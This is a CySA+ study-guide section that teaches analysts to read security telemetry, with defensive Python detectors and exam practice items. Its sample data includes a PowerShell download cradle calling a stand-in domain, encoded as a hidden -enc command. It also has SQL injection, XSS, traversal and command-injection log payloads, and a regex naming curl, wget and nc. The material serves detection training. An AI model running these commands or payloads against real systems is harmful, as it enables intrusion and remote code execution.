2.3 Scenario Practice for Security Operations
Key Takeaways
- Scenario items give telemetry and ask you to name the indicator, the TTP, or the next analytic step.
- Practice mapping observed behavior to MITRE ATT&CK tactics and techniques.
- Host indicators (process anomalies, persistence) and network indicators (beaconing, exfiltration) each have tell-tale patterns.
- Fileless and living-off-the-land (LOTL) attacks abuse trusted tools; detection relies on behavior, not file signatures.
Scenario questions are where CySA+ separates analysts who memorized terms from those who can read evidence. Use a six-step read: identify the data source, establish the baseline, isolate the deviation, map it to a MITRE ATT&CK technique, choose the next analytic action, and predict what confirms it.
Map behavior to MITRE ATT&CK
The MITRE ATT&CK framework organizes adversary behavior into tactics (the why — e.g., Initial Access, Execution, Persistence, Defense Evasion, Command and Control, Exfiltration) and techniques (the how, with IDs like T1059). Learn the high-frequency techniques:
| Technique ID | Name | Telltale evidence |
|---|---|---|
| T1566 | Phishing | Malicious attachment/link in inbound mail |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Encoded -enc PowerShell command lines |
| T1055 | Process Injection | Code running inside explorer.exe/svchost.exe |
| T1071 | Application Layer Protocol (C2) | Regular HTTPS beacons to new domains |
| T1053 | Scheduled Task/Job | Persistence via a task launching a script |
| T1003 | OS Credential Dumping | lsass.exe access by an unexpected process |
Worked scenario: host indicator
A process named svchost.exe runs from C:\Users\Public\ instead of C:\Windows\System32\. The legitimate name with the wrong path is masquerading (T1036, specifically the Match Legitimate Name or Location sub-technique, T1036.005), a defense-evasion technique. Your next step is not to kill it blindly; it is to capture the process tree, hash, and parent (memory and EDR data) before containment, so you preserve evidence and learn how it launched. A real svchost.exe is started by services.exe, so a parent such as powershell.exe or cmd.exe is a second, independent indicator.
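The path-and-parent check from this scenario, written out as an added example (not code from the original page): each process record is compared with where that binary legitimately lives and what legitimately launches it, and anything anomalous is collected together with the evidence to preserve. The expected-location table is a small illustrative subset assuming default Windows install paths; the sample process records are constructed.

```python
"""Flag processes whose name matches a Windows system binary but whose image path
or parent process does not match how that binary is legitimately launched.
Added example; EXPECTED is an illustrative subset, not a complete reference."""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumption: default Windows install locations and the usual parent process.
EXPECTED = {
    "svchost.exe":  {"dirs": {r"c:\windows\system32", r"c:\windows\syswow64"}, "parents": {"services.exe"}},
    "lsass.exe":    {"dirs": {r"c:\windows\system32"}, "parents": {"wininit.exe"}},
    "explorer.exe": {"dirs": {r"c:\windows"}, "parents": {"userinit.exe", "explorer.exe"}},
}

@dataclass
class Proc:
    pid: int
    name: str
    image: str        # full path the process image was loaded from
    parent: str       # parent process image name
    sha256: str = ""  # hash captured from EDR/memory, kept for pivoting later

def check_masquerade(p: Proc) -> list:
    """Return a list of findings for one process (empty means nothing anomalous)."""
    findings = []
    profile = EXPECTED.get(p.name.lower())
    if profile is None:
        return findings                      # not a name we profile
    image_dir = str(PureWindowsPath(p.image).parent).lower()
    if image_dir not in profile["dirs"]:
        findings.append(f"T1036.005 masquerading: {p.name} launched from {image_dir}")
    if p.parent.lower() not in profile["parents"]:
        findings.append(f"unexpected parent {p.parent} for {p.name}")
    return findings

def triage(procs) -> dict:
    """Evidence to capture before containment, keyed by PID: findings, image, parent, hash."""
    report = {}
    for p in procs:
        f = check_masquerade(p)
        if f:
            report[p.pid] = {"findings": f, "image": p.image, "parent": p.parent, "sha256": p.sha256}
    return report

# Constructed sample: one legitimate svchost and one copy living in C:\Users\Public.
SAMPLE = [
    Proc(812, "svchost.exe", r"C:\Windows\System32\svchost.exe", "services.exe", "aaaa"),
    Proc(4120, "svchost.exe", r"C:\Users\Public\svchost.exe", "powershell.exe", "bbbb"),
]

if __name__ == "__main__":
    for pid, entry in triage(SAMPLE).items():
        print(pid, entry)
```

Only the copy in C:\Users\Public is reported, with both findings (wrong directory, wrong parent) and the hash and parent the analyst needs before containment.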
Worked scenario: fileless / living-off-the-land
A server shows regular outbound HTTPS at fixed intervals, consistent payload sizes, to recently registered domains, with no unusual process in memory but a scheduled task calling PowerShell. This is fileless malware using living-off-the-land (LOTL) binaries: it abuses trusted, signed tools (PowerShell, WMI, scheduled tasks) and runs in memory, leaving no traditional file artifact. Signature-based antivirus misses it; detection depends on behavioral analysis: beacon regularity, domain age, and command-line auditing (Event ID 4688, which records the command line only when the "Include command line in process creation events" audit option is enabled; PowerShell script block logging, Event ID 4104, captures the decoded script itself).
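The two behavioral checks this scenario rests on, as an added example that is not part of the original page: a beacon score built from inter-connection timing, payload-size spread, and domain age, and a decoder for the -EncodedCommand argument that a 4688 event would record for the scheduled task's PowerShell action. The flow records and the 4688 command line are constructed, and the DOMAIN_AGE_DAYS table is an assumption standing in for a WHOIS or passive-DNS lookup.

```python
"""Behavioural checks for the fileless/LOTL scenario: (1) score outbound
connections for beaconing (fixed interval, fixed size, young domain) and
(2) decode PowerShell's -EncodedCommand so the analyst sees what actually ran.
Added example over constructed records."""
import base64
import re
from collections import defaultdict
from statistics import mean, pstdev

# Assumption: stand-in for a domain-age lookup (days since registration).
DOMAIN_AGE_DAYS = {"update-cdn-9321.xyz": 6, "www.microsoft.com": 10000}

def beacon_score(flows, min_connections=8, young_domain_days=30, cv_limit=0.1):
    """flows: (epoch_seconds, src_host, dst_domain, bytes_sent).
    Returns {(src, dst): traits}, where traits counts how many of the three beacon
    signs are present: regular timing, constant size, recently registered domain."""
    by_pair = defaultdict(list)
    for ts, src, dst, size in flows:
        by_pair[(src, dst)].append((ts, size))
    scores = {}
    for (src, dst), recs in by_pair.items():
        if len(recs) < min_connections:
            continue                       # too few samples to judge regularity
        recs.sort()
        gaps = [b[0] - a[0] for a, b in zip(recs, recs[1:])]
        sizes = [s for _, s in recs]
        # Coefficient of variation is near zero for machine-timed traffic, large for humans.
        gap_cv = pstdev(gaps) / mean(gaps)
        size_cv = pstdev(sizes) / mean(sizes)
        traits = int(gap_cv < cv_limit) + int(size_cv < cv_limit)
        traits += int(DOMAIN_AGE_DAYS.get(dst, 10**6) < young_domain_days)
        scores[(src, dst)] = traits
    return scores

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_powershell(cmdline: str):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

# --- constructed sample data -------------------------------------------------
# 40 connections exactly 60 s apart, sizes cycling 1187/1191/1195 bytes.
BEACON_FLOWS = [
    (1_700_000_000 + i * 60, "srv-web-02", "update-cdn-9321.xyz", 1187 + (i % 3) * 4)
    for i in range(40)
]
# Irregular, human-looking traffic to a long-established domain for contrast.
HUMAN_FLOWS = [
    (1_700_000_000 + t, "srv-web-02", "www.microsoft.com", size)
    for t, size in [(5, 402), (71, 9931), (80, 231), (600, 1505),
                    (1800, 77), (1803, 6000), (2300, 420), (2310, 15000)]
]
# What a 4688 event with command-line auditing would record for the task's action.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://update-cdn-9321.xyz/a')"
EVENT_4688_CMDLINE = ("powershell.exe -NoP -W Hidden -enc "
                      + base64.b64encode(SCRIPT.encode("utf-16-le")).decode())

if __name__ == "__main__":
    print(beacon_score(BEACON_FLOWS + HUMAN_FLOWS))
    print(decode_encoded_powershell(EVENT_4688_CMDLINE))
```

The beacon pair scores 3 of 3 and the browsing pair scores 0; the decoder turns the opaque base64 into the download cradle the task was running, which is the artifact that confirms the hypothesis.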
Worked scenario: network indicator
NetFlow shows one internal host opening hundreds of short-lived TCP connections to sequential ports on many internal hosts over a few minutes. The baseline is that workstations talk to servers, not to every peer on every port. The deviation is the fan-out pattern. The hypothesis is internal network scanning / discovery (T1046), often a sign of post-compromise lateral movement reconnaissance. The next step is to identify the scanning host, check its recent authentication and process activity, and determine whether it is an attacker-controlled box or an authorized vulnerability scan.
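The fan-out detection from this scenario as an added example (not code from the original page): within a sliding time window, count how many distinct destination hosts and ports each source touches using only short, probe-like flows, and skip sources on an allowlist of authorized scanners. The flow records are constructed and the thresholds are assumptions to tune against your own baseline.

```python
"""Detect scan fan-out in NetFlow-style records: one source touching many
distinct destination hosts or ports within a short window (T1046).
Added example over constructed records; thresholds are assumptions."""
from collections import defaultdict

def make_sample():
    """Constructed flows: (epoch_seconds, src, dst, dst_port, packets)."""
    flows = []
    # Scanner: 40 hosts x 5 sequential ports in about two minutes, one packet each.
    for i in range(40):
        for j, port in enumerate(range(135, 140)):
            flows.append((1_700_000_000 + i * 3 + j, "10.0.5.23", f"10.0.5.{100 + i}", port, 1))
    # Normal workstation: a few long-lived sessions to servers.
    flows += [
        (1_700_000_010, "10.0.5.40", "10.0.1.5", 445, 312),
        (1_700_000_050, "10.0.5.40", "10.0.1.9", 443, 980),
        (1_700_000_090, "10.0.5.40", "10.0.1.5", 445, 120),
    ]
    return flows

def find_scanners(flows, window=300, host_threshold=20, port_threshold=15,
                  max_packets=3, authorized=frozenset()):
    """Return {src: (distinct_hosts, distinct_ports)} for sources that exceed a
    threshold within any window of `window` seconds. Only short flows
    (<= max_packets) count: a completed session looks different from a probe.
    `authorized` lists vulnerability-scanner addresses to ignore."""
    by_src = defaultdict(list)
    for ts, src, dst, port, pkts in flows:
        if pkts <= max_packets and src not in authorized:
            by_src[src].append((ts, dst, port))
    hits = {}
    for src, recs in by_src.items():
        recs.sort()
        best = (0, 0)
        start = 0
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window:
                start += 1                       # slide the window forward
            win = recs[start:end + 1]
            best = max(best, (len({d for _, d, _ in win}), len({p for _, _, p in win})))
        if best[0] >= host_threshold or best[1] >= port_threshold:
            hits[src] = best
    return hits

if __name__ == "__main__":
    print(find_scanners(make_sample()))
    print(find_scanners(make_sample(), authorized={"10.0.5.23"}))
```

The window sets are recomputed for every step, which is fine for a demonstration; for a collector processing millions of flows you would keep running per-window counters instead. The second call shows the authorized-scanner branch of the next analytic step: the same fan-out from a known vulnerability scanner produces no hit.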
The discipline is the same every time: data source, baseline, deviation, technique, action, confirmation.
Deception as a detection source
Decoy credentials, files, or systems are deception technology. A honeypot is a single decoy host; a honeynet is a network of decoy hosts that lets defenders watch a full attack unfold; honeytokens are fake credentials, files, or database records that should never be touched in normal operations. Any access to bait is high-fidelity evidence of an intruder because legitimate users have no reason to interact with it. These controls dramatically reduce false positives — the only people poking at decoys are attackers or careless insiders — and they buy defenders time and intelligence about attacker tooling.
When a stem lists honeypots, honeynets, and decoy files and asks for the single term that covers all of them, the answer is deception technology.
Reading order under exam time
Scenario items are dense, so read the last sentence first to learn what is being asked, then mine the body for the one or two artifacts that decide the answer. Do not let a long backstory distract you; the cue is usually a single value: a path, a port, an event ID, a domain age, or a parent process. Mark and skip a performance-based question (PBQ) that is eating your clock, since a stalled PBQ can cost you several straightforward multiple-choice items elsewhere; come back to it if time remains.
Worked scenario: application indicator
A web server log shows a request such as GET /products?id=1' OR '1'='1 returning an unusually large response, followed by requests containing UNION SELECT. The data source is the web/application log; the baseline is parameter values that are numeric IDs; the deviation is SQL syntax injected into the parameter; the hypothesis is SQL injection (SQLi) attempting to read the database.
Adjacent application indicators to recognize on sight include <script> payloads (cross-site scripting, XSS), ../../etc/passwd (directory/path traversal), encoded shell commands in a parameter (command injection), and abnormally high request rates from one client (credential stuffing or scraping). The next analytic step is to confirm whether the injection succeeded (response size, error messages, data returned), check whether a web application firewall (WAF) blocked it, and review the database logs for the executed query.
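The on-sight recognition this passage describes, run over sample access-log lines as an added example (not code from the original page): each line is parsed, the request path is URL-decoded (attackers encode payloads to slip past naive matching), a small set of patterns labels the indicator, and the follow-up questions are answered from the same data: did an injection get a large 200 response, and is one client hammering the site. The log lines are constructed and the patterns are an illustrative set, not a WAF ruleset.

```python
"""Classify web-server log lines by the application-layer indicator they carry
and surface the follow-up evidence (response size, per-client request rate).
Added example over constructed access-log lines."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Common/combined log format: client, identd, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+)')

PATTERNS = {
    "sqli":       re.compile(r"('\s*or\s*'?\d|union\s+select|;\s*drop\s+table|--\s*$)", re.I),
    "xss":        re.compile(r"(<script|onerror\s*=|javascript:)", re.I),
    "traversal":  re.compile(r"(\.\./|\.\.\\|/etc/passwd)", re.I),
    "cmd_inject": re.compile(r"([;|&`]\s*(cat|id|whoami|wget|curl|nc)\b|\$\([^)]*\))", re.I),
}

def classify(line: str):
    """Return (client_ip, [indicators], status, size), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m["path"])   # match on the decoded request, not the raw bytes
    hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
    return m["ip"], hits, int(m["status"]), int(m["size"])

def analyze(lines, baseline_size=2400, rate_threshold=50):
    """Return (indicator counts, clients whose SQLi drew an oversized 200, noisy clients)."""
    counts = Counter()
    likely_success = set()
    per_client = Counter()
    for line in lines:
        parsed = classify(line)
        if not parsed:
            continue
        ip, hits, status, size = parsed
        per_client[ip] += 1
        counts.update(hits)
        # A successful injection usually returns more data than a normal product page.
        if "sqli" in hits and status == 200 and size > baseline_size:
            likely_success.add(ip)
    noisy = sorted(ip for ip, n in per_client.items() if n >= rate_threshold)
    return dict(counts), sorted(likely_success), noisy

# Constructed sample lines (documentation address ranges, fictitious paths).
SAMPLE = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /products?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 98211',
    '203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /products?id=1%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 200 14000',
    '198.51.100.9 - - [10/Mar/2024:12:00:05 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1800',
    '198.51.100.9 - - [10/Mar/2024:12:00:06 +0000] "GET /download?file=../../etc/passwd HTTP/1.1" 404 512',
    '192.0.2.44 - - [10/Mar/2024:12:00:07 +0000] "GET /ping?host=127.0.0.1;id HTTP/1.1" 500 300',
    '192.0.2.10 - - [10/Mar/2024:12:00:08 +0000] "GET /products?id=42 HTTP/1.1" 200 2100',
]

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The first client's `' OR '1'='1` drew a 98 KB response where a product page is about 2 KB, which is the "did it succeed" signal the text asks you to check; the traversal attempt returned a 404 and the command injection a 500, so those are attempts, not confirmed compromises, until the database and WAF logs say otherwise.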
Worked scenario: social-engineering indicator
Objective 1.2 also covers human-layer attacks. A stem describing an email from support@micros0ft-secure.com urging an immediate password reset, with a link to a look-alike domain, is phishing (T1566) leveraging typosquatting and urgency. A targeted version aimed at an executive is whaling; a phone-based version is vishing; a text-based version is smishing. The analyst indicators are header anomalies (SPF/DKIM/DMARC failures), display-name spoofing, and recently registered look-alike domains.
The next step is to pull the message headers, check whether other recipients received it (a campaign), block the sender and domain, and report it through the phishing-response playbook.
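The header-level checks from the two paragraphs above, written as an added example that is not part of the original page: Authentication-Results is parsed for the SPF, DKIM and DMARC verdicts, the display name is compared with the sender domain, Reply-To is compared with From, the sender domain is normalized (digit-for-letter homoglyphs, filler words such as "secure") and compared with a list of brands you expect mail from, and the body is scanned for urgency language. The raw messages are constructed (the look-alike domain is the one from the scenario), and PROTECTED_BRANDS, the homoglyph map and the filler-word list are assumptions to extend for your environment.

```python
"""Triage a suspected phishing message from its headers: authentication results,
display-name vs. sender-domain mismatch, Reply-To mismatch, look-alike domain,
urgency language. Added example over constructed messages."""
import re
from email import message_from_string
from email.utils import parseaddr

PROTECTED_BRANDS = {"microsoft.com", "okta.com"}        # assumption: senders you trust
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})
NOISE_WORDS = ("secure", "support", "login", "verify", "account")
URGENCY_RE = re.compile(r"\b(immediately|within 24 hours|suspended|expires today)\b", re.I)

def looks_like(domain: str):
    """Return the protected brand a domain imitates, or None (the real brand domain is not a look-alike)."""
    domain = domain.lower()
    if domain in PROTECTED_BRANDS:
        return None
    base = domain.translate(HOMOGLYPHS)               # micros0ft -> microsoft
    base = re.sub(r"\.(com|net|org|co|io)$", "", base)  # drop the TLD
    for w in NOISE_WORDS:
        base = base.replace(w, "")                     # microsoft-secure -> microsoft-
    base = base.strip("-.")
    for brand in PROTECTED_BRANDS:
        if base == brand.split(".")[0]:
            return brand
    return None

def auth_results(msg):
    """Parse Authentication-Results into {'spf': ..., 'dkim': ..., 'dmarc': ...}; missing means 'none'."""
    hdr = msg.get("Authentication-Results", "")
    out = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", hdr)
        out[mech] = m.group(1).lower() if m else "none"
    return out

def triage(raw: str) -> list:
    """Return a list of analyst-readable findings for one raw RFC 5322 message."""
    msg = message_from_string(raw)
    display, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    _, reply = parseaddr(msg.get("Reply-To", ""))
    reply_domain = reply.rpartition("@")[2].lower()
    findings = [f"{mech}={res}" for mech, res in auth_results(msg).items() if res != "pass"]
    brand = looks_like(from_domain)
    if brand:
        findings.append(f"look-alike domain {from_domain} imitates {brand}")
    if display and from_domain not in PROTECTED_BRANDS and \
            any(b.split(".")[0] in display.lower() for b in PROTECTED_BRANDS):
        findings.append(f"display name '{display}' does not match sender domain {from_domain}")
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    body = (msg.get_payload(decode=True) or b"").decode(errors="replace")
    if URGENCY_RE.search(body):
        findings.append("urgency language in body")
    return findings

# Constructed sample: the scenario's look-alike sender, with a relayed Reply-To.
PHISH = """\
From: "Microsoft Support" <support@micros0ft-secure.com>
Reply-To: helpdesk@example.net
To: cfo@example.com
Subject: Action required: password reset
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=micros0ft-secure.com; dkim=none; dmarc=fail header.from=micros0ft-secure.com
Content-Type: text/plain

Your password expires today. Reset it immediately using the link in this message.
"""
# Constructed sample of a message that should produce no findings.
LEGIT = """\
From: "Microsoft Support" <support@microsoft.com>
To: cfo@example.com
Subject: Your monthly statement
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=microsoft.com; dkim=pass header.d=microsoft.com; dmarc=pass header.from=microsoft.com
Content-Type: text/plain

Your statement is ready.
"""

if __name__ == "__main__":
    for f in triage(PHISH):
        print("-", f)
```

The phishing sample produces seven findings (three authentication failures, the look-alike domain, the display-name mismatch, the Reply-To mismatch, and urgency language); the legitimate one produces none. Checking whether other recipients got the same message is a mail-gateway search on the sender and subject, which this header-only check cannot do by itself.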
Practice items
During memory analysis, an analyst finds a process named svchost.exe running from C:\Users\Public\ rather than C:\Windows\System32. Which technique is most likely in use?
A server shows regular outbound HTTPS connections at fixed intervals with consistent payload sizes to recently registered domains. Memory shows no unusual processes, but a scheduled task launches a PowerShell script. What is the most likely conclusion?